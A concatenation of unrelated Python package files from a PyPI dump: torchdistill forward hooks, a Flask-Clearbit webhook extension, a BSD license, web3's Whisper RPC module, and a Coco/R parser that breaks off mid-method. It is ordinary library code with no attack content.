setattr(mod,oldName,depf)
_deprecated_func("filenameToType","filename_to_type")
_deprecated_func("filenameToTypes","filename_to_type")
_deprecated_func("toJson","to_json")
_deprecated_func("fromJson","from_json")
from collections import UserDict, UserList
class _DeprecatedDict(dict):
def __init__(self,oldname,newname,*args,**kwargs):
UserDict.__init__(self,*args,**kwargs)
self._oldname = oldname
self._newname = newname
self._warned = False
def __getitem__(self,key):
if not self._warned:
self._warned = True
warnings.warn("{} will be deprecated in favor of {} in a future version of Klampt".format(self._oldname,self._newname),DeprecationWarning)
return UserDict.__getitem__(self,key)
class _DeprecatedList(UserList):
def __init__(self,oldname,newname,*args,**kwargs):
UserList.__init__(self,*args,**kwargs)
self._oldname = oldname
self._newname = newname
self._warned = False
def __getitem__(self,key):
if not self._warned:
self._warned = True
warnings.warn("{} will be deprecated in favor of {} in a future version of Klampt".format(self._oldname,self._newname),DeprecationWarning)
return UserList.__getitem__(self,key)
def __contains__(self,key):
if not self._warned:
self._warned = True
warnings.warn("{} will be deprecated in favor of {} in a future version of Klampt".format(self._oldname,self._newname),DeprecationWarning)
return UserList.__contains__(self,key)
extensionToTypes = _DeprecatedDict("extensionToTypes","EXTENSION_TO_TYPES",EXTENSION_TO_TYPES)
typeToExtensions = _DeprecatedDict("typeToExtensions","TYPE_TO_EXTENSIONS",TYPE_TO_EXTENSIONS)
unsupportedJsonTypes = _DeprecatedList("unsupportedJsonTypes","UNSUPPORTED_JSON_TYPES",UNSUPPORTED_JSON_TYPES) | PypiClean |
/energon_prometheus_exporter_test-0.0.1-py3-none-any.whl/torchdistill-test/torchdistill/core/forward_hook.py | from collections import abc
import torch
# from torch._six import string_classes
from torch.nn.parallel.scatter_gather import gather
from torchdistill.common.module_util import check_if_wrapped, get_module
def get_device_index(data):
if isinstance(data, torch.Tensor):
device = data.device
return 'cpu' if device.type == 'cpu' else device.index
elif isinstance(data, abc.Mapping):
for key, data in data.items():
result = get_device_index(data)
if result is not None:
return result
elif isinstance(data, tuple):
for d in data:
result = get_device_index(d)
if result is not None:
return result
elif isinstance(data, abc.Sequence) and not isinstance(data, str):
for d in data:
result = get_device_index(d)
if result is not None:
return result
return None
def register_forward_hook_with_dict(module, module_path, requires_input, requires_output, io_dict):
io_dict[module_path] = dict()
def forward_hook4input(self, func_input, func_output):
if isinstance(func_input, tuple) and len(func_input) == 1:
func_input = func_input[0]
device_index = get_device_index(func_output)
sub_io_dict = io_dict[module_path]
if 'input' not in sub_io_dict:
sub_io_dict['input'] = dict()
sub_io_dict['input'][device_index] = func_input
def forward_hook4output(self, func_input, func_output):
if isinstance(func_output, tuple) and len(func_output) == 1:
func_output = func_output[0]
device_index = get_device_index(func_output)
sub_io_dict = io_dict[module_path]
if 'output' not in sub_io_dict:
sub_io_dict['output'] = dict()
sub_io_dict['output'][device_index] = func_output
def forward_hook4io(self, func_input, func_output):
if isinstance(func_input, tuple) and len(func_input) == 1:
func_input = func_input[0]
if isinstance(func_output, tuple) and len(func_output) == 1:
func_output = func_output[0]
device_index = get_device_index(func_output)
sub_io_dict = io_dict[module_path]
if 'input' not in sub_io_dict:
sub_io_dict['input'] = dict()
if 'output' not in sub_io_dict:
sub_io_dict['output'] = dict()
sub_io_dict['input'][device_index] = func_input
sub_io_dict['output'][device_index] = func_output
if requires_input and not requires_output:
return module.register_forward_hook(forward_hook4input)
elif not requires_input and requires_output:
return module.register_forward_hook(forward_hook4output)
elif requires_input and requires_output:
return module.register_forward_hook(forward_hook4io)
raise ValueError('Either requires_input or requires_output should be True')
class ForwardHookManager(object):
"""
Example::
>>> import torch
>>> from torchvision import models
>>> from torchdistill.core.forward_hook import ForwardHookManager
>>> device = torch.device('cpu')
>>> forward_hook_manager = ForwardHookManager(device)
>>> model = models.resnet18()
>>> forward_hook_manager.add_hook(model, 'layer2')
>>> x = torch.rand(16, 3, 224, 224)
>>> y = model(x)
>>> io_dict = forward_hook_manager.pop_io_dict()
>>> layer2_input_tensor = io_dict['layer2']['input']
>>> layer2_output_tensor = io_dict['layer2']['output']
"""
def __init__(self, target_device):
self.target_device = torch.device(target_device) if isinstance(target_device, str) else target_device
self.uses_cuda = self.target_device.type == 'cuda'
self.io_dict = dict()
self.hook_list = list()
def add_hook(self, module, module_path, requires_input=True, requires_output=True):
unwrapped_module = module.module if check_if_wrapped(module) else module
sub_module = get_module(unwrapped_module, module_path)
handle = \
register_forward_hook_with_dict(sub_module, module_path, requires_input, requires_output, self.io_dict)
self.hook_list.append((module_path, handle))
def pop_io_dict(self):
gathered_io_dict = dict()
for module_path, module_io_dict in self.io_dict.items():
gathered_io_dict[module_path] = dict()
for io_type in list(module_io_dict.keys()):
sub_dict = module_io_dict.pop(io_type)
values = [sub_dict[key] for key in sorted(sub_dict.keys())]
gathered_obj = gather(values, self.target_device) if self.uses_cuda and len(values) > 1 else values[-1]
gathered_io_dict[module_path][io_type] = gathered_obj
return gathered_io_dict
def pop_io_dict_from_device(self, device):
device_io_dict = dict()
device_key = device.index if device.type == 'cuda' else device.type
for module_path, module_io_dict in self.io_dict.items():
device_io_dict[module_path] = dict()
for io_type in list(module_io_dict.keys()):
sub_dict = module_io_dict[io_type]
device_io_dict[module_path][io_type] = sub_dict.pop(device_key)
return device_io_dict
def change_target_device(self, target_device):
if self.target_device.type != target_device.type:
for sub_dict in self.io_dict.values():
sub_dict.clear()
self.target_device = target_device
def clear(self):
self.io_dict.clear()
for _, handle in self.hook_list:
handle.remove()
self.hook_list.clear() | PypiClean |
/Flask-Clearbit-0.1.0.tar.gz/Flask-Clearbit-0.1.0/flask_clearbit.py |
import hashlib
import hmac
import logging
import clearbit
import itsdangerous
from flask import Response, abort, request, url_for
from flask.signals import Namespace
from six.moves.http_client import BAD_REQUEST, OK
logger = logging.getLogger('Flask-Clearbit')
clearbit_result = Namespace().signal('clearbit.result')
class Clearbit(object):
"""
Flask-Clearbit
Documentation:
https://flask-clearbit.readthedocs.io
API:
https://clearbit.com/docs?python
:param app: Flask app to initialize with. Defaults to `None`
:param blueprint: Blueprint to attach the webhook handler to. Defaults to `None`
"""
api_key = None
blueprint = None
def __init__(self, app=None, blueprint=None):
if app is not None:
self.init_app(app, blueprint)
def init_app(self, app, blueprint=None):
self.api_key = api_key = app.config.get('CLEARBIT_KEY')
if api_key is None:
logger.warning('CLEARBIT_KEY not set')
return
clearbit.key = api_key
if blueprint is not None:
blueprint.add_url_rule('/clearbit', 'clearbit', self.handle_webhook, methods=['POST'])
self.blueprint = blueprint
def handle_webhook(self):
"""
https://clearbit.com/docs?python#webhooks
"""
request_signature = request.headers.get('x-request-signature')
if request_signature is None:
abort(BAD_REQUEST)
algorithm, signature = request_signature.split('=')
if not all((algorithm == 'sha1', signature)):
abort(BAD_REQUEST)
digest = hmac.new(self.api_key.encode(), request.data, hashlib.sha1).hexdigest()
if not itsdangerous.constant_time_compare(digest, signature):
abort(BAD_REQUEST)
clearbit_result.send(self, result=request.get_json())
return Response(status=OK)
@property
def webhook_url(self):
if self.blueprint is not None:
return url_for('.'.join((self.blueprint.name, 'clearbit')), _external=True)
def __getattr__(self, name):
return getattr(clearbit, name)
# EOF | PypiClean |
/MESSENGERuvvs-1.11.6.tar.gz/MESSENGERuvvs-1.11.6/docs/LICENSE.rst | *******
LICENSE
*******
Copyright (c) 2019, Matthew Burger
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this
list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| PypiClean |
/0x-web3-5.0.0a5.tar.gz/0x-web3-5.0.0a5/web3/shh.py | from web3._utils.filters import (
ShhFilter,
)
from web3.module import (
Module,
)
class Shh(Module):
@property
def version(self):
return self.web3.manager.request_blocking("shh_version", [])
@property
def info(self):
return self.web3.manager.request_blocking("shh_info", [])
def setMaxMessageSize(self, size):
return self.web3.manager.request_blocking("shh_setMaxMessageSize", [size])
def setMinPoW(self, min_pow):
return self.web3.manager.request_blocking("shh_setMinPoW", [min_pow])
def markTrustedPeer(self, enode):
return self.web3.manager.request_blocking("shh_markTrustedPeer", [enode])
def newKeyPair(self):
return self.web3.manager.request_blocking("shh_newKeyPair", [])
def addPrivateKey(self, key):
return self.web3.manager.request_blocking("shh_addPrivateKey", [key])
def deleteKeyPair(self, id):
return self.web3.manager.request_blocking("shh_deleteKeyPair", [id])
def hasKeyPair(self, id):
return self.web3.manager.request_blocking("shh_hasKeyPair", [id])
def getPublicKey(self, id):
return self.web3.manager.request_blocking("shh_getPublicKey", [id])
def getPrivateKey(self, id):
return self.web3.manager.request_blocking("shh_getPrivateKey", [id])
def newSymKey(self):
return self.web3.manager.request_blocking("shh_newSymKey", [])
def addSymKey(self, key):
return self.web3.manager.request_blocking("shh_addSymKey", [key])
def generateSymKeyFromPassword(self, password):
return self.web3.manager.request_blocking("shh_generateSymKeyFromPassword", [password])
def hasSymKey(self, id):
return self.web3.manager.request_blocking("shh_hasSymKey", [id])
def getSymKey(self, id):
return self.web3.manager.request_blocking("shh_getSymKey", [id])
def deleteSymKey(self, id):
return self.web3.manager.request_blocking("shh_deleteSymKey", [id])
def post(self, message):
if message and ("payload" in message):
return self.web3.manager.request_blocking("shh_post", [message])
else:
raise ValueError(
"message cannot be None or does not contain field 'payload'"
)
def newMessageFilter(self, criteria, poll_interval=None):
filter_id = self.web3.manager.request_blocking("shh_newMessageFilter", [criteria])
return ShhFilter(self.web3, filter_id, poll_interval=poll_interval)
def deleteMessageFilter(self, filter_id):
return self.web3.manager.request_blocking("shh_deleteMessageFilter", [filter_id])
def getMessages(self, filter_id):
return self.web3.manager.request_blocking("shh_getFilterMessages", [filter_id]) | PypiClean |
/CocoRPy27-1.4.1.zip/CocoRPy27-1.4.1/Parser.py |
from Errors import Errors
from CharClass import CharClass
from Core import Node
from Core import DFA
from Core import Graph
from Core import Symbol
from Core import Tab
from Core import Comment
from DriverGen import DriverGen
from ParserGen import ParserGen
import sys
from Scanner import Token
from Scanner import Scanner
from Scanner import Position
class Parser( object ):
_EOF = 0
_ident = 1
_number = 2
_string = 3
_badString = 4
# terminals
EOF_SYM = 0
ident_Sym = 1
number_Sym = 2
string_Sym = 3
badString_Sym = 4
COMPILER_Sym = 5
IGNORECASE_Sym = 6
CHARACTERS_Sym = 7
TOKENS_Sym = 8
NAMES_Sym = 9
PRAGMAS_Sym = 10
COMMENTS_Sym = 11
FROM_Sym = 12
TO_Sym = 13
NESTED_Sym = 14
IGNORE_Sym = 15
PRODUCTIONS_Sym = 16
equal_Sym = 17
point_Sym = 18
END_Sym = 19
plus_Sym = 20
minus_Sym = 21
pointpoint_Sym = 22
ANY_Sym = 23
CHR_Sym = 24
lparen_Sym = 25
rparen_Sym = 26
less_Sym = 27
uparrow_Sym = 28
out_Sym = 29
greater_Sym = 30
comma_Sym = 31
lesspoint_Sym = 32
pointgreater_Sym = 33
bar_Sym = 34
WEAK_Sym = 35
lbrack_Sym = 36
rbrack_Sym = 37
lbrace_Sym = 38
rbrace_Sym = 39
SYNC_Sym = 40
IF_Sym = 41
CONTEXT_Sym = 42
lparenpoint_Sym = 43
pointrparen_Sym = 44
from_Sym = 45
import_Sym = 46
star_Sym = 47
NOT_SYM = 48
# pragmas
ddtSym_Sym = 49
maxT = 48
_ddtSym = 49
T = True
x = False
minErrDist = 2
id = 0
str = 1
#-------------------------------------------------------------------------
def __init__( self ):
self.scanner = None
self.token = None # last recognized token
self.la = None # lookahead token
self.genScanner = False
self.tokenString = '' # used in declarations of literal tokens
self.noString = '-none-' # used in declarations of literal tokens
self.errDist = Parser.minErrDist
def getParsingPos( self ):
return self.la.line, self.la.col
def SynErr( self, errNum ):
if self.errDist >= Parser.minErrDist:
Errors.SynErr( errNum )
self.errDist = 0
def SemErr( self, msg ):
if self.errDist >= Parser.minErrDist:
Errors.SemErr( msg )
self.errDist = 0
def Warning( self, msg ):
if self.errDist >= Parser.minErrDist:
Errors.Warn( msg )
self.errDist = 0
def Successful( self ):
return Errors.count == 0;
def LexString( self ):
return self.token.val
def LookAheadString( self ):
return self.la.val
def Get( self ):
while True:
self.token = self.la
self.la = self.scanner.Scan( )
if self.la.kind <= Parser.maxT:
self.errDist += 1
break
if self.la.kind == Scanner.ddtSym_Sym:
self.la.val = '-' + str(self.la.val[1:])
Tab.parseArgs( [ self.la.val, 'filler1', 'filler2' ] )
self.la = self.token
def Expect( self, n ):
if self.la.kind == n:
self.Get( )
else:
self.SynErr( n )
def StartOf( self, s ):
return self.set[s][self.la.kind]
def ExpectWeak( self, n, follow ):
if self.la.kind == n:
self.Get( )
else:
self.SynErr( n )
while not self.StartOf(follow):
self.Get( )
def WeakSeparator( self, n, syFol, repFol ):
s = [ False for i in xrange( Parser.maxT+1 ) ]
if self.la.kind == n:
self.Get( )
return True
elif self.StartOf(repFol):
return False
else:
for i in xrange( Parser.maxT ):
s[i] = self.set[syFol][i] or self.set[repFol][i] or self.set[0][i]
self.SynErr( n )
while not s[self.la.kind]:
self.Get( )
return self.StartOf( syFol )
def Coco( self ):
g = Graph( )
g1 = Graph( )
g2 = Graph( )
s = set( )
if (self.la.kind == Scanner.from_Sym or self.la.kind == Scanner.import_Sym):
ParserGen.usingPos = self.Imports()
self.Expect(Scanner.COMPILER_Sym)
self.genScanner = True
Tab.ignored = set( )
self.Expect(Scanner.ident_Sym)
gramName = self.token.val
beg = self.la.pos
while self.StartOf(1):
self.Get()
Tab.semDeclPos = Position(self.scanner.buffer, beg, self.la.pos - beg, 0)
if (self.la.kind == Scanner.IGNORECASE_Sym):
self.Get( )
DFA.ignoreCase = True
if (self.la.kind == Scanner.CHARACTERS_Sym):
self.Get( )
while self.la.kind == Scanner.ident_Sym:
self.SetDecl()
if (self.la.kind == Scanner.TOKENS_Sym):
self.Get( )
while self.la.kind == Scanner.ident_Sym or self.la.kind == Scanner.string_Sym:
self.TokenDecl(Node.t)
if (self.la.kind == Scanner.NAMES_Sym):
self.Get( )
while self.la.kind == Scanner.ident_Sym:
self.NameDecl()
if (self.la.kind == Scanner.PRAGMAS_Sym):
self.Get( )
while self.la.kind == Scanner.ident_Sym or self.la.kind == Scanner.string_Sym:
self.TokenDecl(Node.pr)
while self.la.kind == Scanner.COMMENTS_Sym:
self.Get( )
nested = False
self.Expect(Scanner.FROM_Sym)
g1 = self.TokenExpr()
self.Expect(Scanner.TO_Sym)
g2 = self.TokenExpr()
if (self.la.kind == Scanner.NESTED_Sym):
self.Get( )
nested = True
Comment(g1.l, g2.l, nested)
while self.la.kind == Scanner.IGNORE_Sym:
self.Get( )
s = self.Set()
Tab.ignored |= s # set union
while not (self.la.kind == Scanner.EOF_SYM or self.la.kind == Scanner.PRODUCTIONS_Sym):
self.SynErr(49)
self.Get()
self.Expect(Scanner.PRODUCTIONS_Sym)
if self.genScanner:
DFA.MakeDeterministic()
Graph.DeleteNodes()
while self.la.kind == Scanner.ident_Sym:
self.Get( )
sym = Symbol.Find(self.token.val)
undef = (sym is None)
if undef:
sym = Symbol(Node.nt, self.token.val, self.token.line)
else:
if sym.typ == Node.nt:
if sym.graph is not None:
self.SemErr("name declared twice")
else:
self.SemErr("this symbol kind not allowed on left side of production")
sym.line = self.token.line
noAttrs = (sym.attrPos is None)
sym.attrPos = None
noRet = (sym.retVar is None)
sym.retVar = None
if (self.la.kind == Scanner.less_Sym or self.la.kind == Scanner.lesspoint_Sym):
self.AttrDecl(sym)
if not undef:
if noAttrs != (sym.attrPos is None) or (noRet != (sym.retVar is None)):
self.SemErr("attribute mismatch between declaration and use of this symbol")
if (self.la.kind == Scanner.lparenpoint_Sym):
sym.semPos = self.SemText()
self.ExpectWeak(Scanner.equal_Sym, 2)
g = self.Expression()
sym.graph = g.l
Graph.Finish(g)
self.ExpectWeak(Scanner.point_Sym, 3)
self.Expect(Scanner.END_Sym)
self.Expect(Scanner.ident_Sym)
if gramName != self.token.val:
self.SemErr("name does not match grammar name")
Tab.gramSy = Symbol.Find(gramName)
if Tab.gramSy is None:
self.SemErr("missing production for grammar name")
else:
sym = Tab.gramSy
if sym.attrPos is not None:
self.SemErr("grammar symbol must not have attributes")
Tab.noSym = Symbol(Node.t, "???", 0) #noSym gets highest number
Tab.SetupAnys()
Tab.RenumberPragmas()
if Tab.ddt[2]:
Node.PrintNodes()
if Errors.count == 0:
sys.stdout.write( "checking\n" )
Tab.CompSymbolSets()
if Tab.ddt[7]:
Tab.XRef()
if Tab.GrammarOk():
if not Tab.ddt[9]:
sys.stdout.write( "parser" )
ParserGen.WriteParser(Tab.ddt[10])
if self.genScanner:
sys.stdout.write( " + scanner" )
DFA.WriteScanner(Tab.ddt[10])
if Tab.ddt[0]:
DFA.PrintStates()
if Tab.ddt[11]:
sys.stdout.write( " + driver" )
DriverGen.WriteDriver()
sys.stdout.write( " generated\n" )
if Tab.ddt[8]:
ParserGen.WriteStatistics()
if Tab.ddt[6]:
Tab.PrintSymbolTable()
self.Expect(Scanner.point_Sym)
def Imports( self ):
beg = None
pos = None
if (self.la.kind == Scanner.from_Sym):
self.Get( )
beg = self.token.pos
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
self.Expect(Scanner.import_Sym)
if beg == None:
beg = self.token.pos
if self.la.kind == Scanner.ident_Sym:
self.Get( )
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.comma_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
elif self.la.kind == Scanner.lparen_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.comma_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
self.Expect(Scanner.rparen_Sym)
elif self.la.kind == Scanner.star_Sym:
self.Get( )
else:
self.SynErr(50)
while self.la.kind == Scanner.from_Sym or self.la.kind == Scanner.import_Sym:
if (self.la.kind == Scanner.from_Sym):
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
self.Get( )
if self.la.kind == Scanner.ident_Sym:
self.Get( )
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.comma_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
elif self.la.kind == Scanner.lparen_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.comma_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
while self.la.kind == Scanner.point_Sym:
self.Get( )
self.Expect(Scanner.ident_Sym)
self.Expect(Scanner.rparen_Sym)
else:
self.SynErr(51)
end = self.la.pos
pos = Position( self.scanner.buffer, beg, end - beg, 0 )
return pos
def SetDecl( self ):
self.Expect(Scanner.ident_Sym)
name = self.token.val
c = CharClass.Find(name)
if c is not None:
self.SemErr("name declared twice")
self.Expect(Scanner.equal_Sym)
s = self.Set()
if len(s) == 0:
self.SemErr("character set must not be empty")
c = CharClass(name, s)
self.Expect(Scanner.point_Sym)
def TokenDecl( self, typ ):
s = self.Sym()
name,kind = s
sym = Symbol.Find(name)
if sym is not None:
self.SemErr("name declared twice")
else:
sym = Symbol(typ, name, self.token.line)
sym.tokenKind = Symbol.fixedToken
self.tokenString = None
while not (self.StartOf(4)):
self.SynErr(52)
self.Get()
if self.la.kind == Scanner.equal_Sym:
self.Get( )
g = self.TokenExpr()
self.Expect(Scanner.point_Sym)
if kind == self.str:
self.SemErr("a literal must not be declared with a structure")
Graph.Finish(g)
if (self.tokenString is None) or (self.tokenString == self.noString):
DFA.ConvertToStates(g.l, sym)
else: # TokenExpr is a single string
if Tab.literals.get(self.tokenString) is not None:
self.SemErr("token string declared twice")
Tab.literals[self.tokenString] = sym
DFA.MatchLiteral(self.tokenString, sym)
elif self.StartOf(5):
if kind == self.id:
genScanner = False
else:
DFA.MatchLiteral(sym.name, sym)
else:
self.SynErr(53)
if (self.la.kind == Scanner.lparenpoint_Sym):
sym.semPos = self.SemText()
if typ != Node.pr:
self.SemErr("semantic action not allowed here")
def NameDecl( self ):
self.Expect(Scanner.ident_Sym)
alias = self.token.val
self.Expect(Scanner.equal_Sym)
if self.la.kind == Scanner.ident_Sym:
self.Get( )
elif self.la.kind == Scanner.string_Sym:
self.Get( )
else:
self.SynErr(54)
Tab.NewName(alias, self.token.val)
self.Expect(Scanner.point_Sym)
def TokenExpr( self ):
g = self.TokenTerm()
first = True
while self.WeakSeparator(Scanner.bar_Sym, 6, 7):
g2 = self.TokenTerm()
if first:
Graph.MakeFirstAlt(g)
first = False
Graph.MakeAlternative(g, g2)
return g
def Set( self ):
s = self.SimSet()
while self.la.kind == Scanner.plus_Sym or self.la.kind == Scanner.minus_Sym:
if self.la.kind == Scanner.plus_Sym:
self.Get( )
s2 = self.SimSet()
s |= s2
else:
self.Get( )
s2 = self.SimSet()
s -= s2
return s
def AttrDecl( self, sym ):
if self.la.kind == Scanner.less_Sym:
self.Get( )
if self.la.kind == Scanner.uparrow_Sym or self.la.kind == Scanner.out_Sym:
if self.la.kind == Scanner.uparrow_Sym:
self.Get( )
elif self.la.kind == Scanner.out_Sym:
self.Get( )
else:
self.SynErr(55)
self.Expect(Scanner.ident_Sym)
sym.retVar = self.token.val
if self.la.kind == Scanner.greater_Sym:
self.Get( )
elif self.la.kind == Scanner.comma_Sym:
self.Get( )
beg = self.la.pos
col = self.la.col
while self.StartOf(8):
if self.StartOf(9):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.greater_Sym)
if self.token.pos > beg:
sym.attrPos = Position( self.scanner.buffer, beg, self.token.pos - beg, col )
else:
self.SynErr(56)
elif self.StartOf(10):
beg = self.la.pos
col = self.la.col
while self.StartOf(11):
if self.StartOf(12):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.greater_Sym)
if self.token.pos > beg:
sym.attrPos = Position( self.scanner.buffer, beg, self.token.pos - beg, col )
else:
self.SynErr(57)
elif self.la.kind == Scanner.lesspoint_Sym:
self.Get( )
if self.la.kind == Scanner.uparrow_Sym or self.la.kind == Scanner.out_Sym:
if self.la.kind == Scanner.uparrow_Sym:
self.Get( )
elif self.la.kind == Scanner.out_Sym:
self.Get( )
else:
self.SynErr(58)
self.Expect(Scanner.ident_Sym)
sym.retVar = self.token.val
if self.la.kind == Scanner.pointgreater_Sym:
self.Get( )
elif self.la.kind == Scanner.comma_Sym:
self.Get( )
beg = self.la.pos
col = self.la.col
while self.StartOf(13):
if self.StartOf(14):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.pointgreater_Sym)
if self.token.pos > beg:
sym.attrPos = Position( self.scanner.buffer, beg, self.token.pos - beg, col )
else:
self.SynErr(59)
elif self.StartOf(10):
beg = self.la.pos
col = self.la.col
while self.StartOf(15):
if self.StartOf(16):
self.Get()
else:
self.Get( )
self.SemErr("bad string in attributes")
self.Expect(Scanner.pointgreater_Sym)
if self.token.pos > beg:
sym.attrPos = Position( self.scanner.buffer, beg, self.token.pos - beg, col )
else:
self.SynErr(60)
else:
self.SynErr(61)
def SemText( self ):
self.Expect(Scanner.lparenpoint_Sym)
beg = self.la.pos
col = self.la.col
while self.StartOf(17):
if self.StartOf(18):
self.Get()
elif self.la.kind == Scanner.badString_Sym:
self.Get( )
self.SemErr( "bad string in semantic action" )
else:
self.Get( )
self.SemErr( "missing end of previous semantic action")
self.Expect(Scanner.pointrparen_Sym)
pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
return pos
def Expression( self ):
g = self.Term()
first = True
while self.WeakSeparator(Scanner.bar_Sym, 19, 20):
g2 = self.Term()
if first:
Graph.MakeFirstAlt(g)
first = False
Graph.MakeAlternative(g, g2)
return g
def SimSet( self ):
n1 = 0
n2 = 0
name = ''
s = set( )
mx = CharClass.charSetSize
if self.la.kind == Scanner.ident_Sym:
self.Get( )
c = CharClass.Find(self.token.val)
if c is None:
self.SemErr("undefined name")
else:
s |= c.set
elif self.la.kind == Scanner.string_Sym:
name = self.String()
if self.StartOf(21):
for i in xrange( 0, len(name) ):
if DFA.ignoreCase:
s.add(ord(name[i].lower()))
else:
s.add(ord(name[i]))
elif self.la.kind == Scanner.pointpoint_Sym:
if (len(name) != 1) or (ord(name[0]) > mx-1):
self.SemErr("unacceptable character value")
else:
n1 = ord(name[0]) % mx
if DFA.ignoreCase and (n1 >= ord('A')) and (n1 <= ord('Z')):
n1 += 32
self.Get( )
if self.la.kind == Scanner.string_Sym:
name = self.String()
if (len(name) != 1) or (ord(name[0]) > mx-1):
self.SemErr("unacceptable character value")
else:
n2 = ord(name[0]) % mx
if DFA.ignoreCase and ((n2 >= ord('A')) and (n2 <= ord('Z'))):
n2 += 32
elif self.la.kind == Scanner.CHR_Sym:
n2 = self.SingleChar(mx)
else:
self.SynErr(62)
for i in xrange( n1, n2+1 ):
s.add(i)
else:
self.SynErr(63)
elif self.la.kind == Scanner.CHR_Sym:
n1 = self.SingleChar(mx)
s.add(n1)
if (self.la.kind == Scanner.pointpoint_Sym):
self.Get( )
if self.la.kind == Scanner.string_Sym:
name = self.String()
if (len(name) != 1) or (ord(name[0]) > mx-1):
self.SemErr("unacceptable character value")
else:
n2 = ord(name[0]) % mx
if DFA.ignoreCase and ((n2 >= ord('A')) and (n2 <= ord('Z'))):
n2 += 32
elif self.la.kind == Scanner.CHR_Sym:
n2 = self.SingleChar(mx)
else:
self.SynErr(64)
for i in xrange( n1, n2 ):
s.add(i)
elif self.la.kind == Scanner.ANY_Sym:
self.Get( )
s = set( )
for num in xrange( 0, CharClass.charSetSize ):
s.add(num)
s.add('ANYCHAR')
else:
self.SynErr(65)
return s
def String( self ):
self.Expect(Scanner.string_Sym)
name = self.token.val
name = DFA.Unescape( name[ 1 : -1 ] )
return name
def SingleChar( self, mx ):
n = 0
self.Expect(Scanner.CHR_Sym)
self.Expect(Scanner.lparen_Sym)
self.Expect(Scanner.number_Sym)
n = int( self.token.val )
if n > (mx - 1):
self.SemErr("unacceptable character value")
if DFA.ignoreCase and ((n >= ord('A')) and (n <= ord('Z'))):
n += 32
n %= mx
self.Expect(Scanner.rparen_Sym)
return n
def Sym( self ):
name = "???"
kind = self.id
if self.la.kind == Scanner.ident_Sym:
self.Get( )
kind = self.id
name = self.token.val
elif self.la.kind == Scanner.string_Sym:
self.Get( )
kind = self.str
name = "\"" + self.token.val[ 1 : -1 ] + "\""
if DFA.ignoreCase:
name = name.lower()
if name.find(' ') >= 0:
self.SemErr("literal tokens must not contain blanks")
else:
self.SynErr(66)
s = name, kind
return s
def Term( self ):
rslv = None
g = None
if self.StartOf(22):
if (self.la.kind == Scanner.IF_Sym):
rslv = Node(Node.rslv, None, self.la.line)
rslv.pos = self.Resolver()
g = Graph(rslv)
g2 = self.Factor()
if rslv is not None:
Graph.MakeSequence(g, g2)
else:
g = g2
while self.StartOf(23):
g2 = self.Factor()
Graph.MakeSequence(g, g2)
elif self.StartOf(24):
g = Graph(Node(Node.eps, None, 0))
else:
self.SynErr(67)
if g is None: # invalid start of Term
g = Graph(Node(Node.eps, None, 0))
return g
def Resolver( self ):
self.Expect(Scanner.IF_Sym)
self.Expect(Scanner.lparen_Sym)
beg = self.la.pos
col = self.la.col
self.Condition()
pos = Position(self.scanner.buffer, beg, self.token.pos - beg, col)
return pos
def Factor( self ):
weak = False
g = None
if self.la.kind == Scanner.ident_Sym or self.la.kind == Scanner.string_Sym or self.la.kind == Scanner.WEAK_Sym:
if (self.la.kind == Scanner.WEAK_Sym):
self.Get( )
weak = True
s = self.Sym()
name,kind = s
sym = Symbol.Find(name)
if (sym is None) and (kind == self.str):
sym = Tab.literals.get(name)
undef = (sym is None)
if undef:
if kind == self.id:
sym = Symbol(Node.nt, name, 0) # forward nt
elif self.genScanner:
sym = Symbol(Node.t, name, self.token.line)
DFA.MatchLiteral(sym.name, sym)
else: # undefined string in production
self.SemErr("undefined string in production")
sym = Tab.eofSy # dummy
typ = sym.typ
if (typ != Node.t) and (typ != Node.nt):
self.SemErr("this symbol kind is not allowed in a production")
if weak:
